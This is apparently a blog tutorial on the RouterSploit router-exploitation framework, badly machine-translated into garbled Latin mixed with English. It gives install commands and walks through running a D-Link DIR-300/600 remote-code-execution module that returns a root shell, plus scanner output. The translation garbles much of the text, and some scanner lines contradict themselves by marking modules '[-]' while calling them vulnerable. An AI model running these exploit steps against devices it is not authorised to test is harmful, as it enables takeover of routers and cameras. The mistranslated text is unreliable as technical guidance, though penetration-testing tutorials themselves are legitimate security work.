Linux Tools

RouterSploit – Abusionem Framework Complete Tutorial [2020]

RouterSploit mirabilis abusus compage specialiter embedded cogitationes.

Hoc instrumentum adhiberi potest a pentestro ad securitatem camerarum et iter itineris scan.

RouterSploit volutpat:

  • Coded in Python.
  • Imperium-linea interface.
  • Docker firmamentum.
  • Instrumenta modulari.

Supported OS:

  1. MacOS.
  2. Linux.
  3. Android Phone.
  4. Windows.

installing RouterSploit:

Requisita:

  • futurum
  • petitiones
  • paramiko
  • pysnmp
  • pycrypto

Libitum:

  • bluepy – bluetooth low energy

Installing in Kali Linux:

Sequi imperia infra:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Minimum Energy firmamentum Bluetooth:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installing in Ubuntu:

Sequi imperia infra:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Minimum Energy firmamentum Bluetooth:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Installing in MacOS:

Sequi imperia infra:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Docker installing in:

Sequi imperia infra:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Quam ut Update RouterSploit??

Vos postulo ut saepe vitare incommodum RouterSploit update.

Novi moduli fere cotidie amet.

cd routersploit
git pull

Quomodo uti RouterSploit?

Consuetudinem

root@kalidev:~/git/routersploit# ./rsf.py
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `-. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`-. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Abusionem Framework for    |_|   by Threat9
            Embedded Devices
  
 Codename   : I Knew You Were Trouble
 Version    : 3.3.0
 Protocollum   : https://www.threat9.com/ - @threatnine
 Join Slack : routersploit.slack.com

 Join Threat9 Beta Program - https://www.threat9.com/

 Exploits: 128 Scanners: 4 Cres: 165 Generic: 4 Payloads: 32 Encoders: 6

rsf * >

Res gestae:

Ad faciendam Abusionem, modulus carpere iustus et pone in scopum:

rsf * > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Ad complementum usus tab clavem.

Ut ostenderet optiones, type show:

rsf * (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


   Nomen Current occasus Descriptio                                
   ----       ----------------     -----------                                
   target target electronica e.g. http"://192.168.1.1     
   port       80                   Scopum Portus

Usus run or * exploit iubes uti scopum:

rsf * (D-LINK DIR-300 & DIR-600 RCE) > Curre
[+] Scopum est vulnerable
[*] Invocans mandatum ansa ...
cmd > whoami
root

Ad optiones:

rsf * (D-LINK DIR-300 & DIR-600 RCE) > set scopum http "://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Inhibere possibile est si scopus ad facinus particulare vulnerandum est:

rsf * (D-LINK DIR-300 & DIR-600 RCE) > reprehendo
[+] Scopum est vulnerable

Curre show info ut ostenderet info de rebus.

Scanning for vulnerable Targets:

Scanners permittite cito cognoscere, si scopus vulnerabilis est ad quaslibet res gestas.

Iisdem imperiis ostendere / set bene, et currere.

rsf * (D-Link Scanner) > Curre
[+] res gestae/dlink/dwr_932_info_disclosure est vulnerable
[-] res / dlink / dir_300_320_615_auth_bypass non est vulnerable
[-] res / dlink/dsl_2750b_info_disclosure est vulnerable
[-] res / dlink / dns_320l_327l_rce non vulnerable
[-] res / dlink / dir_645_password_disclosure est vulnerable
[-] res / dlink / dir_300_600_615_info_disclosure est vulnerable
[-] res / dlink / dir_300_600_rce non est vulnerable

[+] Fabrica est vulnerable!
- res gestae/dlink/dwr_932_info_disclosure

Officialis RouterSploit

Etiam Read: 1337x procuratorem

Ultima verba:

RouterSploit mirabile instrumentum ad usus.

Si quis quaestiones de faciem tuam RouterSploit. Vide infra explanare. Manipulus noster CSHAWK tactus erit vobiscum asap.

Suyash

Hoc Suyash ex India. A studere CyberSecurity, Youtuber, Blogger, Freelancer et penester. Solet articulos scribit communicare scientiam cum mundo.

Recent Posts

Top Apps and Software for Budding Musicians

With the rise of many technological trends, all industries are reaping the benefits. Different technologies

10 months ago

Top 9 Tips to Keep Yourself Safe When Gaming Online

Online gaming is the latest normal in today’s fast-paced digital world. The internet now offers

11 months ago

Pros And Cons Of Getting A Tax Extension for Your Fintech Business

Tax season: the time of year many individuals and businesses dread. The weight of ensuring

11 months ago

Top 5 Games Which Became Most Popular in 2023 – Detailed Review!

As we enter in the final months of 2023, we can talk more clearly about

12 months ago

Erit umquam liber Minecraft Legend?

Since its release in 2011, Minecraft has become one of the most played video games

1 year ago

Can Minecraft Java ludendum cum Xbox?

Minecraft has been active for more than a decade, and in that time it has

1 year ago

This website uses cookies.